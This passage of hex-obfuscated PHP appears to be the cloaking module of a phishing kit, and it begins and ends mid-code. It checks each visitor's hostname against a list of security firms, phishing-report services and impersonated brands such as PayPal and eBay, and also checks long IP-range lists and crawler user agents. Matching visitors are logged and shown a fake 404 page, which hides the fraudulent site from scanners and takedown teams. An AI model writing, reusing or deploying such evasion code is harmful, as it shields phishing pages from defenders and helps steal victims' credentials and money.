x47I\x53\x54\x45R\x20!";}else{$sjnuwfq="\x76\x5fa\x67\x65\x6et";$votjwqxs="\x73\x65\x74t\x69\x6e\x67";${"\x47\x4c\x4fB\x41L\x53"}["\x76\x79u\x67\x78\x6b\x71v\x6b\x6f\x61\x77"]="\x62\x6c\x6f\x63\x6b\x65d_\x77or\x64s";$lrudnkxtptj="br";$oglqxhg="host\x6e\x61m\x65";$fmkpoueduzh="se\x74\x74\x69\x6eg";${$oglqxhg}=gethostbyaddr($_SERVER["\x52\x45M\x4f\x54E_\x41\x44DR"]);${${"G\x4c\x4f\x42\x41L\x53"}["\x76\x79u\x67\x78\x6b\x71v\x6b\x6f\x61\x77"]}=array("\x61\x62\x6fv\x65","goo\x67\x6c\x65","\x73\x6f\x66\x74la\x79\x65\x72","a\x6d\x61\x7a\x6fna\x77\x73","\x63yvei\x6clanc\x65","\x70h\x69s\x68t\x61nk","\x64\x72\x65\x61\x6d\x68o\x73\x74","n\x65tp\x69\x6cot","\x63a\x6cy\x78i\x6e\x73t\x69tu\x74e","\x74o\x72-\x65xi\x74","\x6ds\x6e\x62\x6f\x74","p\x33\x70w\x67\x64\x73\x6e","netcra\x66t","tr\x65\x6ed\x6d\x69cro","\x65\x62a\x79","p\x61y\x70\x61\x6c","\x74\x6frse\x72v\x65rs","\x6de\x73sag\x65\x6c\x61\x62\x73","s\x75c\x75r\x69.net","\x63\x72\x61\x77\x6c\x65r","d\x75ckd\x75ck","\x66\x65\x65d\x66etche\x72","\x42i\x74\x44\x65\x66e\x6e\x64\x65r","\x6d\x63a\x66e\x65","ant\x69v\x69\x72\x75s","\x63\x6c\x6fudf\x6c\x61\x72\x65","\x70\x33\x70wg\x64sn","a\x76\x67","av\x69ra","a\x76a\x73t","\x6fvh.n\x65t","\x73ecu\x72\x69\x74\x79","t\x77\x69\x74\x74\x65\x72","bit\x64\x65\x66end\x65\x72","\x76iru\x73to\x74\x61l","\x70\x68is\x69n\x67","c\x6camav","\x62\x61\x69du","\x73\x61febr\x6fw\x73\x69\x6e\x67","\x65set","mailshe\x6cl","\x61\x7a\x75r\x65","minia\x74\x75r\x65","\x74lh.ro","a\x72u\x62\x61","\x64\x79n.p\x6cu\x73\x2e\x6e\x65\x74","\x70\x61\x67e\x70\x65ek\x65\x72","\x53\x50RO-\x4e\x45T-\x32\x307-\x37\x30-0","SPRO-N\x45\x54-\x32\x309-\x319-1\x32\x38","\x76u\x6c\x74\x72","col\x6fc\x72ossi\x6eg.\x63\x6fm","g\x65\x6f\x73r","d\x72w\x65b","\x64\x72\x2e\x77\x65\x62","\x6cinod\x65.\x63\x6fm","ope\x6e\x64ns","cym\x72u\x2ec\x6f\x6d","s\x6c-rev\x65\x72\x73\x65.com","\x73\x75\x72r\x69\x65l\x2e\x63\x6fm","\x68osti\x6e\x67","o\x72\x61\x6eg\x65-\x6c\x61\x62\x73","s\x70\x65\x65d\x74\x72\x61\x76\x65\x6c","\x6de\x74a\x75r\x69","a\x70p\x6ce\x2e\x63om","b\x72uu\x6b.sk","s\x79s\x6d\x73.\x6ee\x74","o\x72ac\x6ce","\x63i\x73c\x6f","\x61\x6d\x75r\x69\x2e\x6e\x65t","v\x65r\x73\x61\x6eet\x2e\x64e","h\x69lfe-\x76er\x69\x70\x61\x79e\x64.c\x6f\x6d","g\x6f\x6fglebot\x2ec\x6f\x6d","u\x70clo\x75d\x2e\x68\x6f\x73\x74","n\x6fd\x65\x6d\x65te\x72.n\x65t","e-\x61\x63t\x69ve\x2e\x6el","\x64\x6f\x77\x6en\x6ft\x69f\x69e\x72","\x6f\x6e\x6c\x69n\x65-d\x6fma\x69\x6e-\x74o\x6fls","f\x65\x74\x63\x68\x65r6-2.\x67\x6f\x2e\x6da\x69\x6c\x2e\x72\x75","up\x74i\x6dero\x62\x6f\x74\x2e\x63\x6fm","m\x6fn\x69t\x69\x73\x2ecom","\x63\x6fl\x6f\x63\x72o\x73\x73i\x6eg.\x63\x6f\x6d","maj\x65stic\x31\x32","a\x7391\x305\x2ecom","b\x74c\x65n\x74\x72al\x70\x6c\x75s.c\x6f\x6d","\x61\x6eo\x6e\x79mizin\x67-pr\x6f\x78\x79","d\x69\x67italc\x6f\x75\x72a\x67\x65\x2ed\x65","tri\x6fla\x6e.n\x65\x74","\x73\x74\x61\x69r\x63\x61s\x65iro\x6ey","s\x74elk\x6fm\x2ene\x74","\x63\x6f\x6dris\x65.\x72\x75","\x6by\x69\x76\x73ta\x72\x2e\x6ee\x74","\x6d\x70\x64\x65\x64ic\x61ted\x2e\x63\x6f\x6d","\x73\x74\x61r\x6e\x65t\x2e\x6dd","p\x72o\x67\x74e\x63\x68.\x72u","\x68\x69\x6eet\x2e\x6e\x65t","is74\x2e\x72u","s\x68\x6f\x72e\x2en\x65t","\x63yb\x65rinf\x6f","ipred\x61\x74o\x72","unkn\x6f\x77\x6e.\x74el\x65co\x6d\x2e\x67o\x6d\x65\x6c.\x62\x79","m\x69n\x73k\x74e\x6c\x65c\x6fm\x2eby","p\x61r\x6bed\x2e\x66ac\x74io\x6ei\x6ec.\x63\x6f\x6d");${"\x47L\x4fB\x41\x4c\x53"}["\x79j\x77\x78\x64x"]="\x69\x70\x32";${"\x47\x4c\x4f\x42\x41L\x53"}["\x6a\x78\x79\x62\x62\x65\x66t\x71wh"]="s\x65\x74\x74\x69n\x67";if(${${"\x47L\x4fB\x41L\x53"}["\x6c\x78\x69\x73jo\x77\x64\x6e\x72"]}["bl\x6fc\x6b_host"]=="\x6fn"){${"\x47L\x4f\x42\x41L\x53"}["\x78h\x63j\x71e\x72iu\x77"]="bl\x6f\x63\x6bed\x5f\x77\x6f\x72d\x73";foreach(${${"\x47\x4cO\x42AL\x53"}["x\x68\x63j\x71\x65\x72i\x75w"]} as${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x72\x70\x61\x79\x67\x72ln\x70o"]}){${"G\x4c\x4f\x42\x41\x4c\x53"}["on\x70\x63jo\x72\x74\x77\x70"]="\x68ostn\x61\x6d\x65";if(substr_count(${${"GL\x4fB\x41\x4c\x53"}["\x6f\x6e\x70\x63j\x6fr\x74w\x70"]},${${"GL\x4fB\x41L\x53"}["orpa\x79\x67r\x6c\x6e\x70\x6f"]})>0){$xxsxhatmkm="ip";${${"GLO\x42\x41\x4c\x53"}["\x72u\x6dyu\x67\x6b\x6cv"]}=getenv("\x52\x45\x4dO\x54E_\x41D\x44R");$wzfbhirhwug="\x63\x6c\x69ck";${"\x47\x4cO\x42AL\x53"}["\x6bh\x64bq\x6b\x64"]="\x66\x69le";${${"\x47L\x4f\x42A\x4c\x53"}["\x72hyx\x73i"]}=fopen("\x62l\x6fck_\x62\x6ft.t\x78t","\x61");fwrite(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6b\x68\x64\x62q\x6b\x64"]},"\x20B\x4cOCKE\x44\x20BY HOS\x54N\x41\x4d\x45 || u\x73er-a\x67e\x6e\x74\x20:\x20".$_SERVER["HT\x54P_U\x53\x45\x52_\x41G\x45\x4e\x54"]."\n\x20\x69p\x20:\x20".${$xxsxhatmkm}."\x20|| ".gmdate("\x59-\x6e-\x64")." ----\x3e ".gmdate("H:\x69:s")."\n\n");${$wzfbhirhwug}=fopen("\x6co\x67\x73/\x74ot\x61l_b\x6f\x74\x2e\x74xt","\x61");fwrite(${${"G\x4c\x4f\x42\x41L\x53"}["\x79\x6b\x63\x73k\x70\x74xp\x74o\x72"]},"$ip\x20(\x44e\x74\x65\x63t \x62\x79\x20HOS\x54\x4eA\x4d\x45)"."\n");fclose(${${"GL\x4fBA\x4c\x53"}["y\x6bc\x73k\x70\x74\x78\x70\x74o\x72"]});header("\x48\x54\x54\x50/1.0 \x340\x34\x20Not F\x6fu\x6ed");die("<\x21\x44\x4fC\x54YP\x45\x20H\x54\x4d\x4c PUB\x4c\x49C \x22-//IET\x46//D\x54D \x48TM\x4c \x32.0//\x45N\">\x3ch\x74\x6d\x6c><\x68ead>\x3c\x74i\x74le>\x34\x304 \x4eot\x20\x46o\x75nd\x3c/\x74\x69t\x6ce>\n</h\x65\x61\x64\x3e<b\x6f\x64\x79>\n<h\x31\x3eN\x6ft\x20Fo\x75nd\x3c/\x68\x31\x3e\n<\x70>Th\x65\x20\x72equest\x65d \x55\x52L\x20\x77\x61\x73 \x6eo\x74 \x66oun\x64 on\x20t\x68i\x73\x20\x73\x65r\x76\x65\x72.</\x70\x3e\n\x3cp\x3eAd\x64\x69\x74\x69\x6fna\x6cly, a 40\x34\x20\x4eot \x46\x6f\x75\x6e\x64\nerror \x77a\x73 e\x6e\x63ou\x6e\x74\x65r\x65\x64 \x77\x68\x69le \x74\x72y\x69\x6eg \x74\x6f\x20\x75se \x61n E\x72\x72orDo\x63\x75\x6dent\x20t\x6f h\x61nd\x6ce the\x20\x72e\x71\x75est.\x3c/\x70>\n</bod\x79></\x68t\x6dl>");}}}$kccctorp="\x6c\x6f\x63\x6b_\x63o\x75nt\x72y_\x6f\x6e";$zfrdrtdh="i\x70\x73";${${"\x47LO\x42\x41\x4c\x53"}["\x68\x6e\x79s\x68j\x65\x6f"]}=array("6\x36\x2e249\x2e9\x31\x2e*","\x36\x36\x2e24\x39.9\x31.\x320\x33","^8\x31\x2e\x3161.\x359\x2e*","^6\x36.\x31\x335\x2e\x32\x300.*","^66.10\x32.*\x2e*","^38\x2e\x31\x300\x2e*.*","^\x3107.1\x370.*\x2e*","^149\x2e\x320\x2e*.*","^\x338\x2e105\x2e*.*","^7\x34\x2e\x3125\x2e*\x2e*","^6\x36\x2e\x31\x35\x30\x2e1\x34.*","^54\x2e\x31\x37\x36.*.*","^\x33\x38\x2e\x31\x30\x30.*.*","^18\x34\x2e1\x37\x33\x2e*.*","^6\x36\x2e\x3249\x2e*\x2e*","^128.\x324\x32\x2e*.*","^\x37\x32.14.192.*","^2\x30\x38\x2e65\x2e1\x34\x34\x2e*","^\x374\x2e1\x32\x35.*\x2e*","^2\x30\x39.85\x2e1\x328.*","^216\x2e\x32\x33\x39\x2e\x332.*","^\x374.\x3125\x2e*\x2e*","^2\x307\x2e126\x2e\x3144.*","^17\x33.19\x34.*.*","^\x37\x32\x2e\x31\x34.\x31\x392.*","^6\x36.\x3102.*.*","^\x36\x34.1\x38.*.*","^\x319\x34\x2e\x352.6\x38.*","^1\x394\x2e\x37\x32.\x32\x33\x38\x2e*","^6\x32\x2e\x31\x316.\x3207\x2e*","^\x32\x312.5\x30.\x3193\x2e*","^69.\x365.*.*","^5\x30\x2e\x37.*\x2e*","^\x313\x31\x2e\x3212\x2e*.*","^4\x36.11\x36\x2e*.* ","^6\x32\x2e9\x30\x2e*.*","^\x38\x39.138\x2e*\x2e*","^\x382\x2e16\x36\x2e*.*","^8\x35.\x36\x34.*\x2e*","^\x385\x2e\x325\x30.*\x2e*","^89.\x31\x33\x38\x2e*.*","^\x393\x2e17\x32.*.*","^10\x39.\x31\x38\x36.*.*","^\x31\x39\x34\x2e\x39\x30\x2e*.*","^2\x31\x32\x2e2\x39.19\x32\x2e*","^2\x312.29.\x3224\x2e*","^2\x312\x2e1\x34\x33\x2e*.*","^212.1\x350.*\x2e*","^\x321\x32\x2e2\x335\x2e*.*","^\x32\x317\x2e132\x2e*\x2e*","^\x35\x30\x2e9\x37.*\x2e*","^\x32\x317\x2e1\x332.*\x2e*","^\x32\x309.\x38\x35.*\x2e*","^66\x2e\x3205\x2e\x36\x34.*","^\x3204.\x31\x34\x2e\x34\x38\x2e*","^64.\x32\x37\x2e2.*","^6\x37.1\x35\x2e*\x2e*","^2\x30\x32\x2e1\x30\x38.2\x35\x32\x2e*","^\x31\x39\x33\x2e4\x37.80.*","^6\x34\x2e6\x32\x2e1\x336\x2e*","^\x36\x36\x2e221\x2e*.*","^\x36\x34\x2e6\x32\x2e17\x35.*","^\x31\x398\x2e5\x34.*\x2e*","^\x31\x39\x32\x2e11\x35.\x31\x33\x34.*","^\x32\x316\x2e2\x352\x2e1\x36\x37.*","^\x31\x393\x2e25\x33\x2e1\x399.*","^6\x39.6\x31\x2e\x312\x2e*","^64.\x337.\x31\x303\x2e*","^38.1\x34\x34.3\x36\x2e*","^64\x2e\x3124.14\x2e*","^\x3206\x2e2\x38\x2e7\x32\x2e*","^209\x2e\x37\x33.2\x32\x38.*","^1\x358.\x3108.*.*","^\x31\x36\x38\x2e188.*\x2e*","^6\x36.2\x307.120.*","^1\x36\x37\x2e\x324\x2e*\x2e*","^192\x2e11\x38\x2e48.*","^\x36\x37.209.\x31\x32\x38.*","^1\x32\x2e148\x2e\x3209\x2e*","^\x31\x32\x2e\x3148\x2e1\x39\x36.*","^\x3193\x2e22\x30\x2e\x31\x378.*","68.\x36\x35\x2e5\x33\x2e\x37\x31","^\x31\x39\x38.2\x35\x2e*.*","^\x36\x34\x2e\x3106\x2e\x3213.*","^9\x31.103\x2e\x366\x2e*","^\x3208.\x39\x31\x2e\x31\x315.*","^\x31\x399\x2e30\x2e228\x2e*","^84\x2e9\x33\x2e8\x34.*","^\x31\x38\x32.75\x2e\x312\x30.*","^1\x38\x32.\x37\x35\x2e1\x32\x30.10","^\x346.\x310\x31.43\x2e*","^\x3147\x2e\x37\x35.\x3210.*");${"G\x4c\x4fBAL\x53"}["jpj\x70\x76\x77\x70\x77"]="sett\x69\x6e\x67";if(${$fmkpoueduzh}["\x62l\x6fc\x6b\x5f\x69\x70r\x61ng\x65"]=="\x6fn"){$gdzibbp="\x62anne\x64IP";if(in_array($_SERVER["R\x45M\x4f\x54\x45_\x41\x44\x44\x52"],${$gdzibbp})){${"\x47L\x4f\x42A\x4c\x53"}["\x75\x6f\x6d\x6b\x65\x77lp"]="i\x70";${${"\x47L\x4fB\x41\x4c\x53"}["\x72\x75\x6d\x79\x75\x67\x6b\x6c\x76"]}=getenv("RE\x4d\x4fT\x45\x5f\x41\x44\x44R");${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x68\x79xsi"]}=fopen("\x62l\x6f\x63\x6b_\x62\x6ft\x2etxt","\x61");fwrite(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x68\x79\x78\x73\x69"]},"\x20B\x4c\x4f\x43K\x45D\x20\x42\x59\x20\x49\x50 ||\x20u\x73\x65\x72-\x61g\x65n\x74\x20:\x20".$_SERVER["HT\x54P_\x55\x53ER\x5fAGE\x4e\x54"]."\n\x20\x69p : ".${${"\x47L\x4f\x42\x41\x4c\x53"}["\x75om\x6bew\x6c\x70"]}."\x20||\x20".gmdate("Y-\x6e-d")."\x20----> ".gmdate("\x48:\x69:s")."\n\n");${"\x47L\x4f\x42AL\x53"}["n\x78\x71o\x69vm\x68"]="\x63l\x69\x63\x6b";${"\x47L\x4f\x42\x41L\x53"}["\x63pe\x66i\x67\x69\x69"]="cl\x69\x63k";${${"\x47L\x4f\x42\x41L\x53"}["\x79\x6b\x63\x73\x6bp\x74x\x70t\x6f\x72"]}=fopen("\x6c\x6fgs/\x74\x6f\x74\x61l_\x62o\x74\x2e\x74\x78\x74","\x61");fwrite(${${"GLOB\x41\x4c\x53"}["c\x70\x65\x66\x69\x67\x69\x69"]},"$ip (\x44\x65\x74ect \x62y \x49P \x52\x61\x6e\x67e)"."\n");fclose(${${"\x47\x4c\x4fBAL\x53"}["\x6ex\x71\x6f\x69vmh"]});header("\x48\x54T\x50/1\x2e0\x20\x34\x304 \x4eo\x74 F\x6fund");die("<\x21\x44O\x43\x54\x59P\x45\x20\x48\x54ML \x50UB\x4c\x49C \"-//IE\x54\x46//\x44TD\x20H\x54ML 2\x2e0//EN\"\x3e<h\x74\x6d\x6c\x3e<\x68\x65\x61\x64><tit\x6ce\x3e\x3404\x20N\x6ft \x46oun\x64</\x74\x69\x74le>\n\x3c/h\x65\x61\x64><b\x6fdy>\n\x3c\x68\x31\x3e\x4eo\x74 F\x6fu\x6ed</\x68\x31>\n<p>The r\x65q\x75\x65s\x74e\x64\x20URL\x20w\x61\x73\x20no\x74\x20\x66\x6f\x75nd \x6f\x6e\x20\x74\x68is\x20\x73erve\x72\x2e\x3c/p>\n\x3cp\x3eAdd\x69\x74\x69\x6f\x6ea\x6cly,\x20\x61 \x340\x34\x20Not F\x6fun\x64\n\x65\x72ro\x72\x20\x77a\x73\x20\x65n\x63\x6fu\x6et\x65\x72\x65\x64\x20wh\x69le \x74\x72yi\x6e\x67 \x74o \x75se\x20an\x20E\x72r\x6fr\x44\x6f\x63\x75m\x65\x6e\x74\x20\x74\x6f \x68andl\x65\x20\x74he\x20requ\x65st\x2e\x3c/\x70\x3e\n</\x62\x6f\x64\x79></\x68t\x6dl>");}else{foreach(${${"\x47\x4c\x4f\x42A\x4cS"}["\x68\x6e\x79\x73\x68jeo"]} as${${"\x47\x4c\x4f\x42\x41\x4cS"}["rumy\x75\x67\x6bl\x76"]}){if(preg_match("/".${${"\x47\x4c\x4fB\x41L\x53"}["\x72u\x6d\x79u\x67\x6b\x6c\x76"]}."/",$_SERVER["R\x45\x4dO\x54\x45_\x41\x44DR"])){$ofulqhjjlf="\x69p";${"\x47\x4c\x4f\x42\x41L\x53"}["ri\x65\x77\x70\x70\x74\x69\x72\x76"]="file";${$ofulqhjjlf}=getenv("REMOT\x45\x5f\x41DDR");${"\x47\x4c\x4f\x42\x41\x4cS"}["q\x67fs\x63\x6d\x70t\x6e\x6c"]="c\x6c\x69c\x6b";${"\x47\x4c\x4fB\x41\x4cS"}["\x75c\x70\x62\x6f\x77\x67\x6a\x6d"]="\x69\x70";${${"GL\x4fBA\x4cS"}["rh\x79xsi"]}=fopen("\x62l\x6fc\x6b\x5fb\x6f\x74.tx\x74","\x61");fwrite(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x69\x65\x77\x70p\x74\x69r\x76"]},"\x20\x42\x4c\x4f\x43\x4b\x45D \x42Y I\x50\x20||\x20\x75s\x65\x72-ag\x65\x6et :\x20".$_SERVER["\x48T\x54\x50\x5f\x55\x53\x45R_\x41G\x45N\x54"]."\n ip\x20:\x20".${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75\x63\x70\x62\x6f\x77\x67jm"]}." || ".gmdate("Y-n-\x64")." ---->\x20".gmdate("\x48:\x69:s")."\n\n");${${"G\x4cOB\x41L\x53"}["\x79kc\x73k\x70tx\x70\x74\x6f\x72"]}=fopen("\x6co\x67\x73/tot\x61\x6c_b\x6f\x74.tx\x74","a");fwrite(${${"\x47L\x4fBAL\x53"}["\x71\x67\x66\x73\x63mp\x74nl"]},"$ip\x20(Detect\x20\x62y\x20\x49\x50 R\x61\x6e\x67e)"."\n");fclose(${${"\x47\x4cO\x42\x41L\x53"}["\x79\x6bcs\x6bp\x74xp\x74\x6f\x72"]});header("H\x54\x54P/\x31\x2e\x30 \x340\x34 No\x74\x20\x46ou\x6ed");die("<!\x44\x4f\x43TY\x50\x45\x20HT\x4dL\x20\x50UB\x4c\x49\x43 \"-//\x49E\x54F//D\x54\x44\x20\x48\x54ML \x32\x2e0//E\x4e\"\x3e\x3ch\x74\x6d\x6c\x3e\x3ch\x65\x61\x64><tit\x6c\x65\x3e40\x34\x20N\x6ft Fo\x75\x6ed\x3c/\x74\x69t\x6c\x65>\n\x3c/h\x65\x61d>\x3cb\x6f\x64\x79\x3e\n<\x681>\x4e\x6ft\x20Fo\x75n\x64</\x68\x31>\n<p\x3eT\x68\x65\x20reque\x73\x74\x65\x64 \x55RL\x20\x77a\x73 \x6e\x6f\x74\x20\x66oun\x64 \x6fn\x20th\x69\x73 \x73\x65\x72\x76\x65r\x2e\x3c/\x70\x3e\n\x3cp>\x41\x64\x64it\x69o\x6e\x61\x6cly, \x61\x20\x340\x34\x20\x4e\x6f\x74\x20Fo\x75n\x64\ne\x72\x72\x6f\x72 wa\x73\x20\x65nc\x6fun\x74\x65re\x64 \x77\x68\x69\x6c\x65 t\x72\x79in\x67\x20t\x6f \x75\x73\x65\x20a\x6e Er\x72or\x44\x6f\x63\x75\x6d\x65\x6e\x74 to\x20\x68a\x6ed\x6c\x65\x20\x74\x68e re\x71ue\x73\x74\x2e\x3c/p>\n</\x62\x6fdy>\x3c/h\x74\x6d\x6c>");}}}}$qeegojfjfnu="\x6fs";${"\x47LOB\x41\x4c\x53"}["o\x77\x66\x71\x63\x66vi\x63u\x72"]="b\x72";$tmpebarbeg="\x64\x70";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64\x79gu\x69e\x73x\x79\x67\x64d"]="\x62\x6c\x6fc\x6be\x64\x5f\x77or\x64s";${${"\x47L\x4f\x42\x41L\x53"}["o\x63\x62\x7a\x6f\x67\x68"]}=$_SERVER["H\x54\x54\x50\x5f\x55SER_AGE\x4e\x54"];if(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6f\x63\x62\x7a\x6fg\x68"]}=="M\x6f\x7a\x69l\x6c\x61/\x34\x2e\x30\x20(\x63\x6fm\x70at\x69b\x6c\x65;\x20M\x53\x49\x45\x207.\x30\x3b Windows NT 5.\x31\x3b\x20.N\x45T\x20CLR 2.0\x2e\x350\x37\x327)"||${${"G\x4c\x4f\x42\x41\x4c\x53"}["oc\x62zogh"]}=="M\x6fz\x69\x6cla/\x35\x2e0 (\x4d\x61cint\x6fsh\x3b\x20Int\x65l\x20\x4dac\x20O\x53\x20X 1\x30_\x310_\x31) Ap\x70\x6ceWeb\x4bit/\x36\x300.\x32.\x35 (\x4bH\x54\x4dL, \x6cik\x65\x20\x47\x65\x63ko) V\x65r\x73\x69on/\x38.\x30.\x32 S\x61\x66ar\x69/60\x30\x2e\x32.\x35 (\x41\x70\x70\x6c\x65\x62\x6ft/0\x2e1; +ht\x74\x70://w\x77\x77.ap\x70l\x65\x2e\x63o\x6d/g\x6f/\x61\x70ple\x62\x6f\x74)"){${"\x47\x4c\x4f\x42ALS"}["e\x6fs\x64dm\x72"]="\x69\x70";$sqiteeqhw="\x63li\x63\x6b";$rgphgl="i\x70";${"\x47\x4cO\x42\x41\x4c\x53"}["\x6fw\x78\x6b\x76r\x76\x74\x70l\x72"]="f\x69\x6c\x65";$ezsdwlylscom="\x66i\x6c\x65";$rugabqkwpw="c\x6c\x69\x63\x6b";${$rgphgl}=getenv("REM\x4f\x54\x45_\x41DDR");${$ezsdwlylscom}=fopen("bl\x6fck\x5fbo\x74.t\x78\x74","\x61");fwrite(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6fw\x78\x6bv\x72\x76t\x70\x6c\x72"]}," \x42\x4cO\x43K\x45D BY\x20\x41\x50PL\x45\x42\x4f\x54 || user-\x61gent : ".$_SERVER["\x48TTP_\x55\x53\x45R_AGENT"]."\n \x69\x70\x20:\x20".${${"\x47\x4c\x4fB\x41\x4c\x53"}["eosd\x64m\x72"]}." ||\x20".gmdate("Y-\x6e-\x64")." ---->\x20".gmdate("H:i:s")."\n\n");${$rugabqkwpw}=fopen("\x6cog\x73/total_\x62ot.tx\x74","\x61");fwrite(${$sqiteeqhw},"$ip (De\x74e\x63t \x62y \x41\x50\x50\x4cEB\x4f\x54)"."\n");fclose(${${"GL\x4f\x42AL\x53"}["\x79\x6b\x63s\x6b\x70t\x78pt\x6fr"]});header("H\x54\x54\x50/\x31\x2e0\x20\x34\x304 Not Foun\x64");die("\x3c\x21\x44OCTY\x50\x45 H\x54\x4d\x4c\x20PU\x42\x4c\x49C \"-//IET\x46//\x44\x54D H\x54\x4d\x4c\x20\x32\x2e0//E\x4e\"><ht\x6d\x6c><h\x65\x61\x64>\x3c\x74\x69\x74\x6ce>404\x20\x4e\x6f\x74\x20\x46o\x75nd\x3c/t\x69t\x6c\x65\x3e\n</\x68\x65\x61d\x3e\x3cb\x6fdy\x3e\n\x3c\x681>\x4e\x6ft\x20\x46\x6f\x75\x6ed</h1\x3e\n<p>T\x68e\x20\x72\x65queste\x64\x20\x55\x52\x4c was \x6eo\x74\x20foun\x64 on thi\x73 \x73e\x72\x76\x65\x72\x2e</\x70\x3e\n\x3cp\x3e\x41dd\x69\x74\x69\x6fn\x61l\x6cy, \x61 \x340\x34 \x4e\x6f\x74\x20\x46\x6fu\x6e\x64\n\x65\x72\x72or w\x61\x73\x20en\x63o\x75\x6et\x65\x72ed\x20whil\x65\x20tryin\x67\x20to\x20u\x73\x65 an\x20Er\x72\x6f\x72\x44\x6f\x63\x75\x6dent to \x68an\x64l\x65\x20\x74h\x65\x20re\x71u\x65\x73\x74\x2e</p\x3e\n\x3c/\x62\x6fd\x79\x3e</\x68t\x6dl>");}if(${$sjnuwfq}=="Mo\x7a\x69l\x6ca/4.\x30\x20(co\x6dp\x61tible\x3b \x4d\x53\x49\x45 \x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73 \x4e\x54 \x35.\x31\x3b \x2eNET CL\x52 2\x2e\x30.\x350\x37\x32\x37)"){${${"\x47\x4cOB\x41L\x53"}["r\x75\x6d\x79\x75\x67kl\x76"]}=getenv("R\x45\x4d\x4fT\x45\x5f\x41DDR");$ljyiufssy="fi\x6c\x65";$bciwsv="c\x6c\x69ck";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x64\x72\x64\x75\x6d\x71\x7a\x66\x78"]="\x63lick";${${"GLO\x42AL\x53"}["r\x68\x79x\x73\x69"]}=fopen("\x62loc\x6b_bo\x74\x2e\x74xt","a");fwrite(${$ljyiufssy},"\x20\x42LO\x43\x4b\x45D\x20B\x59 \x41P\x50LEBOT\x20||\x20\x75\x73\x65\x72-\x61ge\x6et\x20:\x20".$_SERVER["H\x54\x54P_U\x53\x45R\x5f\x41\x47\x45N\x54"]."\n\x20\x69p : ".${${"\x47L\x4fBAL\x53"}["r\x75\x6d\x79u\x67\x6b\x6c\x76"]}."\x20|| ".gmdate("Y-n-d")." ---->\x20".gmdate("H:\x69:\x73")."\n\n");${$bciwsv}=fopen("lo\x67s/\x74\x6f\x74a\x6c\x5f\x62ot\x2e\x74\x78\x74","\x61");fwrite(${${"\x47LO\x42\x41\x4c\x53"}["\x64r\x64\x75\x6d\x71zf\x78"]},"$ip\x20(\x44\x65\x74ect b\x79\x20AP\x50L\x45\x42\x4fT)"."\n");fclose(${${"GLO\x42\x41L\x53"}["y\x6b\x63\x73k\x70tx\x70\x74\x6fr"]});header("HTT\x50/\x31\x2e0\x20\x3404\x20N\x6ft\x20F\x6f\x75n\x64");die("\x3c!DOC\x54\x59\x50E \x48T\x4d\x4c P\x55B\x4c\x49\x43 \"-//IET\x46//D\x54\x44 HTM\x4c \x32\x2e0//E\x4e\x22>\x3ch\x74m\x6c><\x68\x65a\x64\x3e\x3cti\x74\x6ce>\x340\x34 \x4e\x6ft Fou\x6e\x64</\x74i\x74\x6ce>\n\x3c/\x68\x65ad>\x3c\x62o\x64\x79>\n<h1>\x4e\x6ft Fou\x6e\x64\x3c/\x68\x31\x3e\n\x3c\x70\x3eT\x68\x65\x20re\x71\x75\x65st\x65\x64\x20\x55\x52L\x20\x77as no\x74\x20fo\x75\x6e\x64 \x6fn\x20t\x68\x69s\x20\x73e\x72\x76\x65r.</p\x3e\n<\x70>Ad\x64itiona\x6cly, a 40\x34\x20\x4e\x6ft Fou\x6ed\ne\x72r\x6fr\x20\x77\x61s en\x63\x6funt\x65r\x65d\x20\x77\x68\x69\x6ce \x74\x72\x79\x69\x6e\x67 t\x6f\x20\x75\x73\x65 \x61\x6e \x45r\x72or\x44\x6f\x63\x75\x6d\x65nt \x74o h\x61\x6ed\x6c\x65\x20the\x20\x72\x65qu\x65s\x74\x2e\x3c/p\x3e\n\x3c/\x62o\x64y\x3e\x3c/\x68\x74m\x6c>");}$ekmduw="i\x73\x70\x6ey\x61";if(strpos($_SERVER["H\x54\x54\x50\x5fU\x53E\x52\x5fAGE\x4e\x54"],"fa\x76\x69\x63o\x6e")or strpos($_SERVER["HT\x54\x50\x5f\x55S\x45\x52_AG\x45\x4e\x54"],"\x4aav\x61")or strpos($_SERVER["H\x54TP\x5f\x55S\x45\x52\x5f\x41GENT"],"Fr\x65\x65\x42\x53D")or strpos($_SERVER["HT\x54\x50\x5f\x55S\x45R\x5f\x41\x47\x45N\x54"],"msn\x62o\x74")or strpos($_SERVER["HTT\x50_\x55\x53\x45\x52\x5fA\x47\x45\x4e\x54"],"\x59\x61hoo\x21\x20Sl\x75\x72p")or strpos($_SERVER["\x48\x54\x54P\x5f\x55SE\x52_\x41GE\x4eT"],"Yah\x6foS\x65\x65\x6b\x65r")or strpos($_SERVER["\x48\x54T\x50\x5f\x55\x53\x45\x52_\x41G\x45\x4e\x54"],"G\x6f\x6fg\x6ce\x62\x6ft")or strpos($_SERVER["H\x54TP_\x55\x53E\x52_AGENT"],"\x62ing\x62\x6ft")or strpos($_SERVER["H\x54T\x50\x5f\x55\x53E\x52\x5f\x41\x47\x45NT"],"c\x72\x61w\x6cer")or strpos($_SERVER["HTT\x50_US\x45\x52\x5f\x41GE\x4eT"],"P\x79c\x55\x52\x4c")or strpos($_SERVER["\x48TT\x50\x5f\x55S\x45R\x5f\x41\x47EN\x54"],"\x66\x61ceboo\x6be\x78t\x65rn\x61\x6chi\x74")!==false){header("H\x54\x54\x50/\x31.0\x20\x34\x30\x34 \x4e\x6ft \x46\x6fu\x6ed");die("\x3c!\x44OCT\x59\x50\x45\x20HT\x4dL P\x55B\x4cIC\x20\"-//IE\x54\x46//\x44\x54D\x20H\x54ML\x202.\x30//\x45N\x22\x3e<\x68tm\x6c\x3e\x3ch\x65a\x64\x3e\x3c\x74it\x6c\x65\x3e40\x34\x20\x4e\x6f\x74\x20F\x6fund\x3c/t\x69t\x6c\x65>\n\x3c/h\x65ad>\x3cb\x6f\x64y\x3e\n<h\x31>\x4eo\x74 